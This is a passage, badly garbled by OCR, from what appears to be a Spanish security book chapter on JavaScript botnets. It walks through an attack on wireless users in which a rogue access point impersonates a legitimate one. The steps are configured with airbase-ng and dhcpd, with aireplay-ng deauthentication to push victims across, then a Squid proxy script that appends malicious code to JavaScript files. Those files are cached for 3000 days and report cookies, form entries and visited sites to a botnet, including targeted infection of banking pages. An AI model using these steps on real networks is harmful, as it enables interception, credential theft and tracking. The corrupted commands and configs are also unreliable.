su  autenticación  y  cifrado.  El  rango  de  dircooiunos  a  utilizar  puede  no  ser  demasiada  importante, 
pero  para  usuarios  con  oonooimi entos  medios  que  entiendan  de  protocolo  TCP/TR  les  resallará 
saspochfisn  si  el  rango  de  direcciones  IP  proporgionadas  por  el  punto  do  accoso  suplantado  difiere 
de  [a  ofrecida  por  el  punto  de  acceso  licito.  Es  pur  olio  que  cuanto  más  se  asemeje  el  AP  ilícito  al 
punto  de  acceso  real,  menos  sospechas  levantará-  Evide  ni  emente,  si  se  quiere  suplantar  un  punto 
de  acceso  con  clave  de  acceso,  es  iiecesario  conocer  esta.  En  el  caso  de  claves  WEP,  WPA-PSK  y 
WPA2-PSK  (clave  compartida)  la  suplantación  será  tan  compleja  como  difici!  sea  obtener  esta  clave 
(en  el  casoWER  es  prácticamente  nula).  Para  redes  con  WPAy  WPA2  (en  ucasiones  calificada  como 
FtnerpriÁ'e),  es  necesario  crear  un  seividor  Radius  encargado  de  validar  los  usuarios  conectados. 
Esto  es  posible  mediante  el  frt^war^.  frp.eRadim^  que  se  puede  configurai'  (con  un  script  PHP  por 
ejeiiiplü),  para  guardar  los  valores  de  usuano  y  contraseña  introducidos  por  la  víctinia.  En  tal  caso 
siempre  serán  considei'ados  válidos  y  aproveciiaiido  el  ataque,  será  posible  conseguir  algún  usuario 
real  para  la  validación  Riidíus  tic  la  red  que  se  está  suplantando. 


^hüfed  Key 

Open  Systam/Sliaftai  Kijy 

WA-EAP 

WPA-PSK 

WT*A2  EAP 

WPA?-PÍ>K 

WPA  AtJto  EAP 

IWPA-Aijto-PSK 

Irruí 2 en  11.07:  Ti|>ns  de  ciPafÍD  difij'w>fin>les  eji  liu  AP 


Tomando  como  pi  inicr  ejemplo  el  caso  más  sencillo,  el  de  una  red  abierta  sin  cifrado,  la  coiifigui ación 
consiste  en  establecer  el  nombre  de  la  red  {ESSID),  habilitar  el  DHCP  con  un  rango  de  direcciones 
IP  cualquiera  (vale  el  más  común.  102.168.0.0/24}  y  lo  más  importante,  estableciendo  la  puerta  de 
enlace  a  la  dirección  IP  de  la  máquina  atacante. 
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Es  tlccir,  al^^Lirios  dispositivos  no  permiten  establecer  la  puem  de  enlace  del  servidor  IfflCP,  por 
lo  qne  el  equipo  víciima  no  enviaría  el  tráfico  al  equipo  uLacaiite.  y  la  suplantación  dejada  de  tener 
sentido.  Aunque  el  ESSID  puede  ser  cualquier  nombre,  hay  que  tener  en  cuenLa  que  cuaiiio  menos 
sospecha  levante,  más  clientes  se  conectarán,  por  lo  que  es  más  efectivo  poner  un  nombre  como 
Casa  en  vez  de  Cotiexión  Graris. 

Prueba  de  coneeptü 

Para  la  pmeba  de  concepto,  se  utilizará  un  dispositivo  AF  físico,  concretamente  el  modelo  DWL- 
22()0AF  dcl  rabricaiile  D-Link^  y  un  equipo  con  un  sistema  operativo  Lhmx,  en  este  ejemplo  la 
distribución  UbiAfiñi,  Antes  de  nada,  se  establece  una  IP  estática  en  la  interfaz  ethO  de  la  máquina 
conectada  al  punto  de  acceso  que  se  va  a  configurar,  en  este  caso  1 92. 1  bfí.O.S.  La  otra  interfaz  de  red 
de  la  máquina,  wian0  se  eonccta  a  una  red  con  salida  a  Internet.  Hay  que  recordar  que  ambas  redes 
deben  tener  rangos  IP  diferentes,  para  que  la  función  mnííng  tenga  sertidc]. 

Introduciendo  en  el  navegador  la  dirección  IF  del  dispositivo  AP,  se  conecta  al  parci  de 
administración,  donde  una  vez  introducido  el  usuario  y  la  contraseña  se  accede  a  la  configuración. 
A  pesar  de  encontrar  infinidad  de  categorías  y  opciones,  lo  único  inLcrcsniite  para  la  suplantación  es 
la  eonfiguraciÓJi  Wireless,  y  el  servidor  DHCP.  Para  ima  primera  pnieba,  se  va  a  configunir  una  red 
abierta.  En  la  sección  se  elige  el  nombre  de  la  red  (ESSID)  que  se  quiere  emitir,  por  ejemplo 

MiCasa.  La  seguridad  se  establece  como  OPN,  y  se  elige  un  canal  cualquiera. 
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Para  la  sección  de  servidor  DHCP,  se  habilita  la  función  y  se  configura  la  IP  a  partir  de  la  cual  el 
ser\ndor  ofrecerá  direcciones,  por  ejemplo  192. 168.0. 1 00,  con  un  máximo  de  1 00.  La  máscara  de  red 
la  más  común,  255,255.255.0,  y  lo  más  importante,  el  GaiEway  introduciendo  la  dirección  IP  de  la 
interfaz  de  red  conectada  al  AP,  192,168.0.5,  Posiblemente,  elAP  necesite  reiniciarse,  mientras  tanto 
se  habilita  la  funciíin  de  mumr  de  la  máquina  con  alguno  de  los  métodos  ya  citados. 
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Imagen  11.09  :  ConfiEiiFadón  D  I  ¡CP  con  ranino  por  defecto. 
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Cuandí)  ni  AP  vLLül  Vil  Qstar  operativo,  con  el  dispositivo  ÍOS  se  buscan  las  redes  Wi-Fi  disponibles, 
entre  las  que  debería  aparecer  AííCasa  y  se  realiza  la  conexión  a  ella.  Si  la  lou figuración  ha  sido 
coiTecta,  abriendo  el  navegador  se  debería  poder  navegar  sin  ninguna  dificultad.  Para  compro bai^ 
que  el  tráfico  está  pasando  por  la  máquina  recién  configurada,  nada  mejor  que  utilizar  ia  herraniiejita 
Wiresharky  capturar  los  paquetes  de  la  interfaz  del  AP,  tihO.  Otra  opción  más  visual  es  la  utilidad 
í./r///í£jr,  cuya  interfaz  giáfica  es  una  simple  ventana  donde  irán  apareciendo  las  imágenes  capturadas 
del  tráfico  de  red  generado  por  los  dispositivos  conectados  al  j\F. 


Imagen  IldO:  íkrramienta captiu'arair  iiTirigeiies. 


Como  segunda  prueba  de  concepto,  se  va  a  configurar  una  red  más  compleja,  con  seguridad  WPA2~ 
PSK  y  nn  rango  IP  no  estándar.  Como  ya  se  ha  mencionado,  para  una  suplantacióii  de  este  tipo  es 
necesario  conocer  previamente  la  clave  de  la  red  que  se  va  a  suplantan  Fn  el  caso  de  no  disponer 
de  esta  clave,  se  podría  intentar  utilizando  el  mismo  FSSTD  de  la  red  original  y  dejando  la  red  sin 
seguridad,  buscando  esos  clienTes  incautos. 

T.o  primero  a  configurar  en  el  AP  es  la  diiwción  IP  del  propio  dispositivo,  ya  que  la  red  a 
configurar  utiliza  un  rango  diferente  al  establecido  por  defecto.  Suponiendo  que  esa  red  trabaja  en 
el  rango  1 92 .1 68.64.0/26,  se  e?tablece  la  IP  del  AP  en  192,168.64.1  y  la  máscara  de  subied  como 
2fib.255.255, 192.  Mientras  el  dispositivo  se  reinicie,  en  el  equipo  atacante  lambiéri  se  modifica  la 
IP  de  ia  interfaz  t;¿h0  a  192. 16 8. 64 ..5  para  pertenecer  a  la  misma  subred  que  la  recién  asignada  al 
dispositivo  AP.  Se  vuelve  a  la  configuración  del  A?,  sección  ¡Vi-Fi  y  se  configura  el  ESSID  con 
el  misTno  nombre  que  el  AP  orígínaL  en  este  caso  4P4SL.  El  mismo  nombre  significa  respetar  los 
car  actores  exactainenie  iguales,  con  mayúsculas,  minúsculas  etcétera  L1  tipo  de  seguridad,  como  se 
ha  definido  para  el  ejemplo  es  WPA2-PyK,  y  la  clave  que  ba  sido  obtenida  del  punto  de  acceso  lícito. 
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iambién  hay  que  tener  en  cuenta  el  canal  en  el  que  está  emitiendo  el  punto  de  aeec.so,  ya  que  ni  ser 
un  AP  suplantado,  el  alcance  de  laí^  ondas  puede  quedar  minado  por  interferencia  con  el  punto  de 
acceso  lícito.  Es  por  ello  una  buena  práctica  ütüiznr  un  canal  con  un  salto  de  dos  posiciones  respecto 
al  original. 

'iVTjeless  Band  |  lFrFad¿.11g  vj 

Mode  I  Access  Poinl  v  | 

Vílrelesa  NetWork  Nam^'SS^}  1 4P4aL  ~  | 

33  ED  Broatkast  |  Cnabl&  ^ 

1^  ^  □  Auto  Channet  Sean 

Audientlcaílon  |WPA2-PSK 

PassPbrasa  Settings  “  — 

Cipl^arTypo  [AES  v|  Group Key  Update  tnküv:il  |lSi<Xt  ~| 

HuísPlnase  ^ 

IiEiiíBtíii  li.il:  Cunfigurtidon  Wí-Fi  de  una  supiautacióri  de  AP  con  WTA2’PSK. 

En  cuanto  al  DHCP.  como  se  lia  mencionado  aiiteiioiiiieiLte,  se  eonfiguni  íim  el  nuevo  rango, 
siendo  la  IP  inicial  192.168.64.10  y  e!  máximo  de  direcciones  IP  a  asignar  52  (hay  que  recordar 
que  e<]Ti  esin  subred,  la  ultima  IP  disponible  es  192.168.04.62).  Al  igual  que  antes,  eí  Gateway  es 
la  dirección  de  la  dirección  establecida  en  ethO  de  la  máquina,  1 92.1 68.64.5.  Una  vez  aplicados  los 
cambios  y  rciuieiado  el  AP,  se  realiza  la  misma  prueba  con  el  dispositivo  iPhone  para  comprobar 
que,  efectivamente,  el  tráfico  ''pasa”  por  la  máquina  atacante. 


Iira^er  11.12:  'DHCP  |i.iTñ  un  mu^o  IP  per&oiiñlizíidc\ 


Como  alternativa  a  un  tlispositivo  AP  físico,  se  dispone  de  hen-amientas  capaces  de  crear  una  red  Wi- 
Fl  mediante  una  tarjeta  If  irciess  cliente  estándar  (aunque  no  todos  los  modelos  son  compadhlcs).  í  ,a 
herramienta  más  conocida  para  este  propósito  os  atrhase-jig^  incluida  en  de  auditoría  fiíí  e/íí.s'.i 

Aircrück-ng.  Hay  que  tener  en  cuenra  que  esta  utilidad  es  capaz  de  “convertir”  la  taijeta  ¡Vireiess 
en  punto  de  acceso,  pero  además  de  esto  hace  falta  un  semdor  DHCP  que  asigno  dircooíímcs  ÍP 
válidas  a  las  victimas,  utilizandu  para  ello  el  famíiso  scrv'icio  dhep-server.  Hay  que  tener  en  cuenta 
que  dado  que  la  tarjeta  inalámbrica  se  utiliza  para  crear  el  punto  de  acceso,  será  la  interfaz  cableada 
la  que  proporcione  salida  a  Internet.  Es  necesario  adaptar  el  redireccioiiamieiiío  de  iptables  para  h 
nueva  configuración. 

-  En  el  nehero  /etc./dhc.p/dhcpdcúnf  se  establece  la  configuración  que  utilizará  el  servidor 

dhcp  para  distribuir  las  direcciones  IR 
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Flíf  ItjíL  Vn^  Bcokiíiiafks  SifOÜPtns  Hfíp 


ddns-upcate-style  nona; 

aption  coíMin-naiiia-serv^rs  m.ie3.G5.5; 

Infrijilt  -lease-tima  69; 
lax-taá^i!  i  im?'  72; 
authoritatiiífi; 
log- fácil Ity  loca 17; 

SE*n€t  192,16a.e^,ü  retm^sk  253. 255,0  \ 
rrmqn  1^7.365,69.33  192. 1&B,69. 234; 

njuLerii  197.165.65.5; 
option  dcuairí-naiie-sítirvBri  192.1fiR.sra.5; 
}autharitative; 
ri  Ins  -  Lipd  Bte  -3  tyle  ncjne; 
tíaíiju  IL  l  caso  tfnp  669; 
nan-lease-tiae  72í&3ij 
subret  1. 1.1.9  netfiask  255.255. 255. 3H. 
rani^  1.1.1.19»  1.1.1.U6Q; 
npHon  fotJters  1.1. 1.1; 
option  domair-naifte-servers  1.1. 1.1; 


I 

Evit 


[Q  WriteOul  1 

1  Re31(1  EiIp  i 

n  Pra/  Pfjqe  Q 

¡  CtiC  1 

Q  Cur  hos 

B  JtJBtify  i 

!  Where  Ja  \ 

i  UlüU  Pjgi!  I 

¡  Unfirf  Tert  | 

U  To  Spell 

i 

í64iS<fííÓ 

1 

Imagen  11.13:  Fichero  de  conrtgi: ración  del  servidor  DHCP. 


-  Se  configura  la  taijeta  iiialáiiibiica  en  modo  mtínítor:  airmon-ng  st^rtt  wlafiO, 


í^e  ^  VieBi  aoctarks  saifinps 

r  9uL@bbürtL:/hQ0ie/i64#  alnücm-ng  stsrt 

% 

■W;  Ífi4:b3<4l 

Imager.  I L14:  Se  establece  la  tarjeta  inalÁnibriou  en  mpdi..>  nnonúor. 


-  Con-  airbíiae-n^,  se  determina. la  configuración  del  punto  de  acceso,  y  coriiieniía  a  emitir: 
airhasa-ng  -1 100  -P -C2-c6  -essid  Gratis  rnonO. 


ríe  Edít  View  Bo^nuiks  Settings,  Kelp 

root^übuntii  Vhcfii&/i&4#  airlsisc  -I  1B6 

-P  r  2  -c  6  —essid  MíCssñ  mana  m 

hlil  mibñ±  '  1 

^  .  -  " 

imagen  í  H  Cumaudo  ¿iirUi^e-ng  para  la  creación  del  AF. 


So  le  asigna  una  dirección  IP  a  la  interfaz  íiialámbrioa  en  Triodo  monitor:  ifconfig  monO 
192.1 68. 0.5. 


Ríe  Ed¿  Vípí;  Boefemarks  Settin^s 

raot^ií¡)yntu:/hoíije/í64#  Ifconfig  mon^  liíZ.  l&S.i].s| 

■  i 

"r--  ■  ■   ■ 

Imagen  1 1  .líí:  Se  establece  la  dirección  IP  estática. 


-  ULifizando  la  configuración  previamente  creada,  se  lanza  el  servicio  dhcp  para  la  interfaz 
que  hace  de  punto  de  acceso:  dhepd ~cf /alc/dhcp/dhcpd.co7if  mon0 
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.  Fllg  £úít  VIew  BockETiárks  sgttíngs 
rQaftg=üburtL:/h<HTi&/^i54tf  dhcph  -cf  /atr/dhcp/dhcpd^conf 

'19  fe:ftash 

Imagen  11.17:  Iniciando  el  servicia  DHCP. 


Para  ambas  pruebas,  si  se  quiere  que  el  ataque  sea  más  efectivo,  es  posible  realizar  una  denegación 
de  servicio  a  todos  los  clientes  asociados  a  un  punto  de  acceso.  Bien  sea  a  los  puntos  lícitos, (pitra 
forzar  la  conexión  ai  suplantado),  o  a  cualquier  punto  de  acceso  al  que  se  tenga  alcance, (para  que 
sean  los  propios  usuarios  los  que  busquen  una  red  a  la  que  conectarse,  al  comprobar  que  su  red  actual 
no  penniLc  conectarse).  Este  ataque  se  puede  hacer  de  manera  temporal  o  indefinida,  mediante  la 
herramienta  afreplay  ng  incluida  también  en  la  suite  alrcrack-rig. 

Dicha  herramienta  permite  varios  tipos  de  ataque,  como  autenticación  falsa  o  reinyección  de  paquetes 
ARP,  pero  la  que  realmente  intei-esa  en  este  ámbito  es  la  “deautenticacióif '  de  clientes  legítimos.  La 
sintaxis  de  aú-eplay-iíg  para  un  ataque  de  este  tipo  es  la  siguiente: 

Airepiay-ng  -0  <nihnen}  de  paquetes  a  pj7víar>  -o  <  Mac  del pvnto  de  úccesú>  -c  <mac  del  cliente 
a  expu¡sar>  <iníejfaz  WMess'> 


En  el  caso  de  no  introducir  la  opción  c,  serán  todos  los  clientes  conectados  los  afectados  por  el 
ataque. 


Fttp  Fin  VÍBflf  OcolciTi^rb  SeUiqgs 

Help 

rMt^buntuí/bi3r»e/i&4#  aíraplay-ng  - 

3  10  -a  peñol 

i 

iiiiíHgijji  1  L.IS;  "‘dtíuuLtínliCíttiiÓii”  de  chíMitcs. 


4,  Ataque  de  infección  de  ficheros  JavaScript 

Una  vez  que  se  ha  comprobado  que  todo  el  tráfico  de  las  víctimas  viaja  a  través  del  equipo  atacan  Le, 
se  i mpl ementa  un  ataque  de  infección  de  caché  de  navegador,  utilizando  los  propios  ficheros  que  las 
víetimas  solicitan  en  la  navegación  web  para  InfectaTÍasT 

El  proceso  de  infección  consiste  en  añadir  código  malicioso  (llamado  pasarela)  a  los  ficheros 
JavaScript  que  se  devTielveu  en  cada  petición  littp  de  las  victimas.  Fsle  cóíligo  Tnalíeioso  es  el 
encargado  de  llamar  al  fichero  payhad  de  nn  equipo  atacante  con  dirección  pública  en  Internet, 
donde  reside  una  Botnet  JavaScript,  para  gestionar  y  almacenar  toda  la  iiiforniacíón  enviada  por 
cada  víctima.  Para  ampliai  el  alcance  y  la  peisislencia  de  k  in lección,  a  csUjs  ficheros  JavaScrípí 
originales  infeetados  se  les  modifica  la  fecha  de  expiración  para  que  caduquen  a  los  3ÜÜÜ  días  (a 
efectos  prácticos,  imperecederos). 


Capitulo  XJ.  JavaScript  Botnets 
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Esta  Botneí^  creada  para  la  ocasión,  dispone  de  í^us  propios  payioach  para  extraer  aifoimación  y 
cjLxuLar  código  Jtn’ííScr/c*/  sin  el  consentimiento  de  las  víctimas.  Como  se  verá  más  adekiiLc,  existen 
herramientas  públicas  tnny  avanzadas  basadas  en  Ja^^aScripí  y  con  multitud  át poyioads,  por  lo  que 
es  posible  utilizar  estas  sin  necesidad  de  crear  una  personalizada. 

Para  cunseguii’  añadir  contenido  a  los  ñcheros  JavaScript  e  infectarlos,  es  necesario  contar  con  un 
cuya  función  es  rccscribír  los  ficheros ys’  dirigidos  a  la  victima.  Como  todo  el  tráfico  pasa  por 
ia  máquina  atacante  (Ml'l'M),  ella  misma  puede  albergar  el  aoftvvai’e//ro.^y  y  modificar  estos  ficheros. 
La  idea  es  crear  un  pro?:y  entre  la  interfaz  de  red  que  recibe  e]  tráfico  de  la  victima,  y  la  interfaz  que 
da  acceso  a  ínlcmet.  Además,  es  necesar  io  que  este  proxy^  sea  transparente,  redirigiendo  el  tráfico 
http  entrante  por  el  puerto  SO,  al  piicrLí)  dtjnde  reside  el  proxy  y  viceversa.  Lna  vez  infectado  el 
fichero,  se  guarda  en  una  ruta  local  Apache,  esté  configurado  con  el  módulo  mod  expires  para 
cambiar  su  tiempo  de  expiración,  y  finalmente  enviárselo  a  la  víctima. 

Los  ficheros  infectados  se  guardarán  en  cxiché  del  di.^positivo  durante  tiempo  indefinido,  por  lo  que 
el  ataque  es  persistente,  incluso  fuera  de  la  red  suplantada.  Cada  vez  que  la  víctima  acceda  a  una 
web  donde  se  utilice  un  fichero  JavaScript  descargado  con  aiiteriondad  en  la  red  suplantada,.  ,  no 
realizará  una  petición  al  fichero  origen,  sino  que  lo  leerá  de  su  propia  caché. 

Prueba  de  concepto 

Para  realizar  la  prueba  de  concepto,  se  dispondrá  de  dos  máquinas  atacantes,  una  con  IP  publica 
accesible  a  través  de  íntemeL  que  albergará  la  Boínet^  y  otra  encargada  de  infectar  víctimas  mediante 
la  suplantación  de  .4?, 

Eli  la  máquina  pública  es  necesario  configurar  un  servidor para  albergar  la  Botnct  JavaScript 
cuyas  dependencias  son;  MySql  para  abiiacenar  toda  la  información  de  las  víctimas,  y  PHP  cottio 
motor  de  la  propia  Botnct,  Para  facilitar  la  instalación  de  estos  tres  elementos  se  puede  recurrir  a 
soluciones  como  LAMP  {Linux  Apache  MySql  PHP\  un  paquete  para  instalar  y  etíiiíigurar  todos 
los  requisitos  del  server  de  una  vez.  Se  crea  un  directorio  vimial  en  Apache,  de  nombre poison,  que 
contiene  el  portal  de  administración  de  la  Botnet  y  los  payioads  disponibles,  a  los  que  se  llaniaiá 
desde  el  código  JavaScript  malicioso.  La  máquina  ya  está  prepara  para  servir  los  payioads  a  las 
víctimas  y  controlarías  con  el  panel  de  control. 

En  el  equipo  encargado  de  la  infección,  el  sofrw^are  a  utilizares  SQUJD,  un  proxy  de  software  libre,  y 
el  servidor  La  instalación  de  estos  es  trivial,  siendo  io  más  cómodo  realizarla  a  Lravéí^  de  un 

gestor  de  paquetes  cnino  apPgct,  aptitude  o  pacman.  La  única  función  Apache  en  esta  máquina 
es  la  funcionalidad  que  ofrece  el  módulo  de  inodifieación  de  expiración  de  caché. 

Para  habilitarlo,  basta  con  mover  el  fidiero  mod_expires  del  directorio  /pAcJapachel /mochiles _ 
avaibúble  al  direciorii^  /eic/apachcl/madiiles  enablcd.  Si  se  quiere  hacer  mediante  consola. 
el  comando  a  ejecutar  es  el  siguiente:”  a2eninod  mod_expires''  con  privilegios  suficientes.  La 
eonngüración  del  módulo  se  realiza  a  tmvés  del  fichero  .htaccess  del  directorio  donde  residan  los 
ficheros  a  los  que  se  quiera  modificar  la  expiración.  Se  crea  un  directorio  temporal  para  almacenar 
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los  iicheros  míe  ciados,  cu  la  mía  /yar/www/tmp  y  se  genera  el  fichero  .h  tacatas  cou  iíh  editor  de 
texto,  al  que  se  le  iiitroduce  la  con  figuración  del  módulo  de  expiración. 


rite  Edit  Vitw  BoDkmarb  Help 


ixpíresActive  On 

CxpiresDefatilt  ^'eccess  plus  days* 


K  Ü£t  Hell 

1  UriteauB  ril 

1  Justif  vfl  Mtiere  1| 

n  Prev  Pd 

H  Cut  TexS  Cur  Pos 

H  UiiCuE  ^  Td  Spcl  L 

B  Exit  1 

B  Mext 

P 

m": 

I$4!b5^h 

-Ll 

Imaí^cn  l  L19:  Fichero  JiíarAzas.^  con  la  configuT  ación  para  f¿i:od_expíri:s. 


La  configuración  de  un  proxy  es  larga  y  tediosa  como  así  lo  demuestra  el  fichero  sqnidconfl  por 
sueiíe  la  funcionalidad  que  se  ncecsiLa  que  cLimpla  es  eonereta  y  sencilla.  I x}  primero  es  establecer  el 
pueno  en  el  que  SQUID  va  a  escuchar.  Por  defecto  es  el  312^  y  no  hay  necesidad  de  cambiarlo,  pero 
sí  de  añadirle  el  atributo  tramparent  para  que  el  pn>xy  pueda  funcionar  en  modo  transparente.  Lo 
siguiente  a  configurar  es  la  permisividad  delpjraxy,  que  hahitiialmente  es  configurada  para  bloquear 
y  controlan  y  cu  este  caso  interesa  permitir  iodo.  Para  ello  se  establece  la  directiva  hrtp  access  en 
allow  í?//. 

La  d  i  meti  v  a  más  i  mp  olíante  a  config  urar  en  e  Ipwxy  e  s  ur¡_rtwrit(í _program .  E  sla  in  di  e  a  I  a  api  i  caei  ón 
[>  scripí  encargado  de  procesar  las  peticiones,  y  retomar  una  URL  en  base  a  cada  petición.  Ln  este 
caso  concreto,  va  a  ser  esta  directiva  la  encargada  de  infectar  los  ficheros  yíivcí5cr/^í,  utilizando  para 
ello  mi  script  en  Perl. 


Iinagen  1 1 .20:  Configuración  de  SQI  ÍTT>. 

Este  xcript  revisa  cada  petición,  y  para  aquellas  que  cumplen  con  la  expresión  regular  de  im  fichero 
con  extensión  js.  se  realiza  la  descarga  del  ficherc  de  la  petición^  se  alniacena  en  el  propio  equipo 
(utilizando  como  nombre  de  fichero  el  idendficador  de  proceso  actual,  ;y  un  contador),  eoncrc  Lamen  Le 
en  la  oaipeia  temporal  habilitada  para  la  moílific ación  de  expiración  de  caché,  al  que  se  le  concatena 
el  código  JavaScript  malicioso,  contenido  en  el  fichero  con  nombre  pasareia.Js. 
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fni.^gen  lL2i:  Scrip!  Pítr!  la  directiva  urt_rBwrUe^mgriim. 


Lste  código  será  el  que  se  ejecute  en  la  máquina  \ictima,  pai'a  así  realizar  las  acciones  programadas. 
En  el  caso  de  la  Bolmt  de  sano  liada,  se  llamará  al  fichero  payloadPHP  alojado  en  el  Hervidor 
público,  para  roporlar  su  identidad  mediante  jsonip.PHP  encargado  de  reportar  el  identificador  de  la 
víctima.  Otro  caso  puede  ser  la  comunicación  con  BeEF  (como  se  verá  más  adelante),  o  la  ejecución 
de  U£i  payload  dkectamenle. 

Dado  que  es  una  prueba  de  concepto,  para  mostrar  efectiva  la  infección  en  el  cliente,  en  vez  de 
utilizar  el  fi  chero  pasarela  js  de  conexión  a  la  Botnet,  se  utilizará  el  ñchero  aierijs  cuyo  contenido  es 
una  ñinción  para  mostrar  un  mensaje  de  alerta  a  la  victima.  Hecho  esto  se  retorna  la  mía  del  fichero 
infectado  recién  creado  al  el  i  en  Le,  de  una  manera  tota!  mente  transparente  y  ftjncional. 

El  último  paso  consiste  en  redirigir  el  tráfico  http  de  la  mterfaz  de  red  conectada  al  AP^  al  puerto  en  el 
que  escucha  el/^rojiy.  en  este  caso  el  puerto  por  defecto,  3128.  En  Lifmx  es  tan  fácil  como  eslableeer 
una  eorrccta  política  Nm  mediante  el  comando  iptables^  además  de  enmascarar  las  peticiones  de  la 
interfaz  conectada  al  AP,  redirigidas  a  la  interfaz  con  salida  a  Internet  como  se  ha  hecho  antes. 


Imagen  11.22:  Scripi  de  re  dirección  y  eiiraascaramiento. 
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Para  compiobar  su  tuncioiiamieiito,  se  conecta  el  dispositivo  iPhom  a  la  red  Wi-Fi  siiplantada,  y  se 
accedo  a  eLialqLiier  web  desde  el  navegador.  Aunque  en  el  dispositivo  la  navegación  es  completamente 
normal,  todos  los  ticheros  js  que  el  navegador  ííclieiLa  se  le  reloniaii  infecladoSj  además  de  quedar 
almacenados  en  su  propia  caché  con  una  expiración  de  3000  días.  El  punto  más  fuerte  en  csLc 
tipo  de  aiüque  reside  en  que  ufia  vez  fuera  de  la  red  suplantada,  cualquier  petición  que  este  mismo 
dispositivo  haga  a  una  web  en  las  que  se  solicite  el  mi  sin  o  fichero  JavaScripL  volverá  a  ejecutai  el 
Fayioad  y  reportará  datos  nuevamente  al  servidor  donde  reside  la  Boinet. 


1f%d  mini 


bttp  ://w  w  w.  a  pple .  co  m 

Has  sido  infootrídÉi! 


Imapen  1 1J3:  Fichero/s  infectado  con  GÍen  en  iPhone, 

En  esta  prueba  de  concepto  laiíoí/ie/  recoge  datos  de  las  víetimaH  et)mu  direcciones  web  visitadas. 
cookies  y  valores  introducidos  en  fonnulaiios,  aunque  el  potencial  que  ofrece  es  enorme.  Hay  que 
tener  en  cuenta  que  a  pesar  de  cpie  las  víctimas  ya  no  estén  en  el  AP  suplantado,  y  ei  ataque  MTM 
no  sea  opei'ativo,  se  puede  afirmar  que  signe  persistiendo  el  ataque  llamado  Man  in  the  tah,  donde 
el  único  ámbito  del  ataque  es  la  propia  pestaña  del  navegador  donde  se  está  ejecutando  el  código 
JavúScñpt  malicioso. 

Hasta  ahora  todos  ios  ataques  y  la  recolecta  de  información  ba  sido  indiserímiTiada,  sin  luiigún  tipo 
de  ci  iterio.  Pero  taiubién  existe  la  opción  de  realizar  un  ataque  dirigido^  seleccionando  qué  ficheros 
JavaScript  de  qué  w'eb  infectar,  y  sin  la  necesidad  de  que  la  víctima  visite  dicho  sitio  web.  Esto 
es  útil  pai'a  ¡nléctar  ficheros  de  webs  que  la  víctima  no  visitaría  en  lugares  donde  no  coiiíle,  como 
bancos,  pero  si  lo  hará  en  un  entorno  de  coiiñanza  con  una  red  que  pueda  administrar. 

El  primer  paso  es  elegir  el  Ja^^aScripi  a  inlectaiH  Para  ello  se  elige  la  web,  y  se  busca  en  su  código 
fuente  la  etiqueta  HIML  de  carga  de  un  fichero  js  estático.  Este  será  c!  fieliero  que  la  víctima  se 
descaigará  y  se  iníéctará  sin  ni  siquiera  saberlo.  Además  de  añadirlo  a  su  cciché  con  cjípirdción 
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inñnita  para  sus  próximas  visitas  m  una  red  de  canfianza.  Después  se  modifica  el  pai^load  con 
la  instrucción  de  escribir  el  fichero  y j  elegido  en  el  fichero  qne  acLualmcnLc  se  está  descargando. 
Dicho  de  otra  manera,  se  infecta  un  fichero  JavaScripl  que  ía  víctima  haya  solicitado  incluyéndole 
la  peiición  del  fichero  elegido  para  el  ataque  dirigido.  Dste  fichero  volverá  a  ser  infcctarfo  y 
almacenado  en  caché,  para  su  futura  utilización. 

Una  vez  que  la  víctiTna  se  encuentre  en  un  entorno  confiable-  como  su  propio  hogar  y  su  propia  red, 
visitará  webs  que  no  visitaiía  en  otro  cnLomo  como  por  ejemplo,  como  ya  se  ha  niencionado  antes, 
su  banco.  Al  realizarla  petición  de  la  web,  solicitará  el  A  elegido  anteriorfiiculo,  y  cargará  ese  fichero 
infectado  de  la  caché,  por  lo  que  se  volverá  a  conectar  a  la  máquina  pública  donde  se  encuentra  el 
portal  de  administración  de  la  Botneí  y  se  podrá  continuar  con  el  ataque. 

El  hecho  de  que  el  ataque  tenga  continuidad  una  vez  que  la  víctmia  so  encuentre  fúem  de  ía  red 
suplan [ada  no  solo  peimite  ataques  dirigidos,  shio  que  oblcnieTido  la  dirección  IP  de  la  vícthiia  se 
puede  realizar  un  seguhniento  geográfico  a  través  de  los  diferentes  servicios  de  getjlocalizñcicin  de 
las  direcciones  iP  disptjnibles  en  Internet.  Aunque  es  cierto  que  su  precisión  no  es  la  de  un  sistema 
GPS,  pcnuiLc  conocer,  por  ejemplo,  sí  lia  salido  de  la  ciudad. 

Visto  el  fi]ncionamiento  de  la  infección  de  J¿r>^üScjipt  lo  primero  que  se  puede  pensar  es  en 
desactivar  la  ejecuQiéíi  JavaScript  en  el  navegador  del  dispositivo,  pero  además  Je  perder  gran  parte 
de  la  funcionalidad  de  las  webs  actuales,  esto  no  asegura  la  no  ejecución  de  código  Jm^aScrip!  como 
se  verá  a  continuación.  Además,  aunque  d  diente  haya  deshabtlitado  JavaScripty  hay  que  tener 
en  cuenta  que  no  solo  con  JavaSeñp;  se  pueden  capturar  datos  del  cliente  y  manipularlos,  ya  que 
existen  otras  inyeecinues,  basadas  en  CSS,  SVG  y  otros  lenguajes  que  soporta  el  navegador 

que  podrían  permitir  compoitamieotos  siinilaros. 

Por  último,  se  descubrió  que  en  IOS  ó,  tOS  6JJJ  e  iOS  6.0  2  existe  un  bug,  catalogado  con  el 
C VE -201 3-0974  que  permite  habilitar  JavaScript  en  una  pagina  w^cb  aunque  el  usuario  lo  haya 
deshabil¡Lad(}  en  las  preferencias. 

El  biíg  existe  en  la  caracterisiiea  de  StnartApp  Bamier^  que  pemiite  proinocionar  una  aplicación  de 
App  Síorc  desde  el  navegador,  para  lo  que  se  puede  comprobar  ^i  la  app  en  cuestión  está  ya  instalada 
(para  abrirla)  o  si  no  lo  está  (para  abrir  ei  enlace  en  la  App  Store).  El  problema  es  que  para  comprobar 
si  la  aplicación  proiiiocionada  es  compatible  con  el  dispositivo  que  se  encuentra  visitando  la  w^eb, 
es  necesaiio  Jav¿iScript,  y  si  el  terminal  no  lo  tiene  habilitado,  1  o  habilita  directamente  y  sin  ningún 
tipo  de  uotificacióii.  Con  lo  cual,  aprovechando  csia  vulnerabilidad  el  ataque  de  iii lección  Jt/raScri/ji 
sigue  siendo  igual  de  efectivo.  Dado  que  la  característica  de  S?núrt  Ápp  Bairners  se  basa  eu  una 
simple  etiqueta  KTMT ..  con  el  mismo  entorno  con  el  que  se  lia  hecho  1a  infección  se  puede 

hacer  la  inyección  H'fML  para  incluir  dicha  cíiqucia,  y  así  asegurar  la  ejecución  de  JavaScripí.  La 
modificación  del  script  para  la  inyección  HTML  es  trivial  y  carece  de  sentido  describiría. 

